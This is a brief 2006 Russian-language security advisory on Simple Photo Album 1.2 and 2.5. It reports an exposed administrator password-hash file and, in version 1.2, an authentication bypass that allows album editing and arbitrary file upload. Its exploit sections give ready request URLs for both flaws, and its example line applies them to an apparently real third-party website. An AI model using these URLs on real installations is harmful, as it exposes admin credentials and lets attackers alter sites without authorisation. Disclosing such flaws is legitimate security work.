уязвимости Simple Photo Album - 1.2 и 2.5

2006-11-08T00:00:00
ID SECURITYVULNS:DOC:14962
Type securityvulns
Reporter Securityvulns
Modified 2006-11-08T00:00:00

Description

Software: Simple Photo Album - 1.2 и 2.5 Vendor: www.gieson.com Vulnerability: получение удаленным пользователем файла с хешем администратора Simple Photo Album в 1.2 и 2.5, возможность редактирования фотоальбома в обход авторизации, загрузка произвольных файлов - версия 1.2. Risk: высокий Date: 7.11.2006 discovered by durito [damagelab] -durito[at]mail[dot]ru- HTTP: durito.narod.ru www.damagelab.org

+~~~:| Details |:

Получение удаленным пользователем файла с хешем администратора Simple Photo Album в 1.2 и 2.5.

+~~~:| Экплойт |:

http://target.com/Simple Photo Album/albums/pwd.txt

+~~~:| Details 2 |:

Возможность редактирования фотоальбома в обход авторизации, загрузка произвольных файлов - только версия 1.2

+~~~:| Экплойт |:

http://target.com/Simple Photo Album/index.php?action=editAlbum&displayAlbumName=[имя_фотоальбома]

++++++++++++++++++++++++++

пример: http://www.keebonk.ch/pix/albums/pwd.txt http://www.keebonk.ch/pix/index.php?action=editAlbum&displayAlbumName=set9